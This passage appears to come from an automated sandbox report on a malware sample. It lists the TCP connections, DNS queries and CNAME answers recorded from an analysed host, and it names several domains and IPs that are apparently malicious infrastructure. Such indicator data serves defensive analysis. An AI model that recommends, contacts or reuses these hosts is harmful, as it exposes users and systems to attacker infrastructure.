                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.898252964 CEST805002284.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.898281097 CEST5002280192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.898298025 CEST5002280192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:12.014879942 CEST805002284.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:12.015156031 CEST5002280192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:12.019087076 CEST5002280192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:12.024568081 CEST805002284.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.043850899 CEST5002380192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.049238920 CEST80500233.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.049312115 CEST5002380192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.070478916 CEST5002380192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.075911045 CEST80500233.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.684076071 CEST80500233.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.685266972 CEST5002380192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:18.584408998 CEST5002380192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:18.589822054 CEST80500233.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:19.602773905 CEST5002480192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:19.608226061 CEST80500243.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:19.611624002 CEST5002480192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:19.623116016 CEST5002480192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:19.628669024 CEST80500243.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:20.242175102 CEST80500243.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:20.245208025 CEST5002480192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:21.131165028 CEST5002480192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:21.136693001 CEST80500243.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.149925947 CEST5002580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.156754017 CEST80500253.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.156924963 CEST5002580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.168350935 CEST5002580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.173801899 CEST80500253.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.173837900 CEST80500253.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.794642925 CEST80500253.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.794697046 CEST5002580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:23.679337025 CEST5002580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:23.684798956 CEST80500253.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:24.696803093 CEST5002680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:24.702414036 CEST80500263.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:24.702501059 CEST5002680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:24.710629940 CEST5002680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:24.716079950 CEST80500263.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:25.337759972 CEST80500263.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:25.338737965 CEST80500263.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:25.338793039 CEST5002680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:25.340899944 CEST5002680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:25.346215010 CEST80500263.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.633069992 CEST5002780192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.638619900 CEST8050027129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.638700962 CEST5002780192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.652751923 CEST5002780192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.658232927 CEST8050027129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:31.602010965 CEST8050027129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:31.649128914 CEST5002780192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:31.782744884 CEST8050027129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:31.785181046 CEST5002780192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:32.162771940 CEST5002780192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:33.181808949 CEST5002880192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:33.187463045 CEST8050028129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:33.187553883 CEST5002880192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:33.201466084 CEST5002880192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:33.207055092 CEST8050028129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:34.162050962 CEST8050028129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:34.211361885 CEST5002880192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:34.349688053 CEST8050028129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:34.351274967 CEST5002880192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:34.709332943 CEST5002880192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:35.728142023 CEST5002980192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:35.734914064 CEST8050029129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:35.737302065 CEST5002980192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:35.748178959 CEST5002980192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:35.755116940 CEST8050029129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:35.756756067 CEST8050029129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:36.713831902 CEST8050029129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:36.756154060 CEST5002980192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:36.903320074 CEST8050029129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:36.903381109 CEST5002980192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:37.256253958 CEST5002980192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:38.274858952 CEST5003080192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:38.281166077 CEST8050030129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:38.284230947 CEST5003080192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:38.291840076 CEST5003080192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:38.297527075 CEST8050030129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:39.252938032 CEST8050030129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:39.303019047 CEST5003080192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:39.441688061 CEST8050030129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:39.441787958 CEST5003080192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:39.443341017 CEST5003080192.168.2.5129.226.176.90
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:39.448689938 CEST8050030129.226.176.90192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.469130993 CEST5003180192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.474471092 CEST8050031213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.474594116 CEST5003180192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.486295938 CEST5003180192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.491750002 CEST8050031213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:45.318584919 CEST8050031213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:45.365531921 CEST5003180192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:45.442670107 CEST8050031213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:45.442728043 CEST5003180192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:45.998712063 CEST5003180192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:47.009182930 CEST5003280192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:47.014792919 CEST8050032213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:47.014955044 CEST5003280192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:47.026241064 CEST5003280192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:47.031682014 CEST8050032213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:47.869518995 CEST8050032213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:47.912708998 CEST5003280192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:47.996593952 CEST8050032213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:47.996871948 CEST5003280192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:48.537535906 CEST5003280192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:49.555982113 CEST5003380192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:49.561374903 CEST8050033213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:49.561522007 CEST5003380192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:49.572637081 CEST5003380192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:49.578080893 CEST8050033213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:49.578188896 CEST8050033213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:50.406546116 CEST8050033213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:50.459325075 CEST5003380192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:50.530824900 CEST8050033213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:50.530924082 CEST5003380192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:51.084429026 CEST5003380192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:52.102951050 CEST5003480192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:52.108429909 CEST8050034213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:52.108540058 CEST5003480192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:52.119189024 CEST5003480192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:52.124604940 CEST8050034213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:52.976507902 CEST8050034213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:53.021800995 CEST5003480192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:53.090090036 CEST8050034213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:53.090205908 CEST5003480192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:53.091113091 CEST5003480192.168.2.5213.249.67.10
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:53.096467018 CEST8050034213.249.67.10192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.131124973 CEST5003580192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.136524916 CEST805003567.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.139480114 CEST5003580192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.155334949 CEST5003580192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.160892963 CEST805003567.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.821808100 CEST805003567.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.859822035 CEST805003567.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.859899044 CEST5003580192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:59.662534952 CEST5003580192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:00.681734085 CEST5003680192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:00.687299013 CEST805003667.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:00.687391043 CEST5003680192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:00.708987951 CEST5003680192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:00.714467049 CEST805003667.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:01.359957933 CEST805003667.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:01.398641109 CEST805003667.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:01.398710012 CEST5003680192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:02.227374077 CEST5003680192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:03.244431019 CEST5003780192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:03.250036001 CEST805003767.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:03.250124931 CEST5003780192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:03.269017935 CEST5003780192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:03.274823904 CEST805003767.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:03.274856091 CEST805003767.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:04.309240103 CEST805003767.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:04.347747087 CEST805003767.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:04.347829103 CEST5003780192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:04.771969080 CEST5003780192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:05.790678024 CEST5003880192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:05.796598911 CEST805003867.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:05.796704054 CEST5003880192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:05.803985119 CEST5003880192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:05.810234070 CEST805003867.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:06.469444990 CEST805003867.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:06.507708073 CEST805003867.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:06.507895947 CEST5003880192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:06.508795023 CEST5003880192.168.2.567.223.117.169
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:06.515101910 CEST805003867.223.117.169192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:14.628403902 CEST5003980192.168.2.5129.226.56.200
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:14.634057045 CEST8050039129.226.56.200192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:14.634135008 CEST5003980192.168.2.5129.226.56.200
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:14.642524004 CEST5003980192.168.2.5129.226.56.200
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:14.648108006 CEST8050039129.226.56.200192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:15.608798027 CEST8050039129.226.56.200192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:15.678138971 CEST5003980192.168.2.5129.226.56.200
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:15.793620110 CEST8050039129.226.56.200192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:15.793848991 CEST5003980192.168.2.5129.226.56.200
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:15.794583082 CEST5003980192.168.2.5129.226.56.200
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:15.800344944 CEST8050039129.226.56.200192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.290157080 CEST5004080192.168.2.5162.0.215.33
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.297703981 CEST8050040162.0.215.33192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.297807932 CEST5004080192.168.2.5162.0.215.33
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.307502985 CEST5004080192.168.2.5162.0.215.33
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.312902927 CEST8050040162.0.215.33192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.986254930 CEST8050040162.0.215.33192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.986274958 CEST8050040162.0.215.33192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.986285925 CEST8050040162.0.215.33192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.986299992 CEST8050040162.0.215.33192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.986314058 CEST8050040162.0.215.33192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.986342907 CEST5004080192.168.2.5162.0.215.33
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.986470938 CEST5004080192.168.2.5162.0.215.33
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:22.024185896 CEST8050040162.0.215.33192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:22.024257898 CEST5004080192.168.2.5162.0.215.33
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:22.818809032 CEST5004080192.168.2.5162.0.215.33

                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:32.984894037 CEST6500153192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:33.734946966 CEST53650011.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:49.961872101 CEST6372253192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:49.976183891 CEST53637221.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:03.337460995 CEST6498653192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:03.355448008 CEST53649861.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:16.870012045 CEST5730553192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:16.896651983 CEST53573051.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:31.462186098 CEST4978753192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:31.481498003 CEST53497871.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:44.781260014 CEST5619153192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:44.810873032 CEST53561911.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:58.260027885 CEST6007953192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:58.278000116 CEST53600791.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:06.354254007 CEST5003953192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:06.556608915 CEST53500391.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:20.150219917 CEST6134353192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:20.198770046 CEST53613431.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:33.995348930 CEST6365053192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:34.010365963 CEST53636501.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:48.212110996 CEST5165553192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:48.978600979 CEST53516551.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:03.275454044 CEST5761053192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:03.338252068 CEST53576101.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.027053118 CEST6531853192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.039882898 CEST53653181.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.357108116 CEST5870853192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.629791021 CEST53587081.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.447115898 CEST5700853192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.466593981 CEST53570081.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.105468988 CEST5177053192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.128691912 CEST53517701.1.1.1192.168.2.5

                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:32.984894037 CEST192.168.2.51.1.1.10x7597Standard query (0)www.dxfwrc2h.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:49.961872101 CEST192.168.2.51.1.1.10xfc23Standard query (0)www.nieuws-july202491.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:03.337460995 CEST192.168.2.51.1.1.10xac32Standard query (0)www.putizhong.homesA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:16.870012045 CEST192.168.2.51.1.1.10xcd5aStandard query (0)www.coba168.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:31.462186098 CEST192.168.2.51.1.1.10xb1d3Standard query (0)www.everyone.golfA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:44.781260014 CEST192.168.2.51.1.1.10xf02aStandard query (0)www.royapop.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:58.260027885 CEST192.168.2.51.1.1.10x465cStandard query (0)www.jy58gdwf7t.skinA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:06.354254007 CEST192.168.2.51.1.1.10x41ceStandard query (0)www.b-ambu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:20.150219917 CEST192.168.2.51.1.1.10x9280Standard query (0)www.livpure-grab.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:33.995348930 CEST192.168.2.51.1.1.10xdc27Standard query (0)www.bandukchi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:48.212110996 CEST192.168.2.51.1.1.10x286Standard query (0)www.mcse.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:03.275454044 CEST192.168.2.51.1.1.10xcc55Standard query (0)www.voidzero.techA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.027053118 CEST192.168.2.51.1.1.10x7ba9Standard query (0)www.huwin.clubA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.357108116 CEST192.168.2.51.1.1.10x3339Standard query (0)www.xueerr.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.447115898 CEST192.168.2.51.1.1.10x25cfStandard query (0)www.onlineblikje.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.105468988 CEST192.168.2.51.1.1.10x698aStandard query (0)www.rtpsilva4d.clickA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:33.734946966 CEST1.1.1.1192.168.2.50x7597No error (0)www.dxfwrc2h.sbsb1-3-r11-gmhudx.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:33.734946966 CEST1.1.1.1192.168.2.50x7597No error (0)b1-3-r11-gmhudx.t9d2quy5.shopb1-3-r11.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:33.734946966 CEST1.1.1.1192.168.2.50x7597No error (0)b1-3-r11.t9d2quy5.shopb1-3-r111-s65psj.8uqm5xgy.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:33.734946966 CEST1.1.1.1192.168.2.50x7597No error (0)b1-3-r111-s65psj.8uqm5xgy.shopb1-3-r11-nff52.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:33.734946966 CEST1.1.1.1192.168.2.50x7597No error (0)b1-3-r11-nff52.alicloudddos.topb1-3-r111-s65psj.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:33.734946966 CEST1.1.1.1192.168.2.50x7597No error (0)b1-3-r111-s65psj.alicloudddos.topb1-3-r111-55g56.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:33.734946966 CEST1.1.1.1192.168.2.50x7597No error (0)b1-3-r111-55g56.kunlundns.topb1-3-r111.kunlundns.topCNAME (Canonical name)IN (0x0001)false
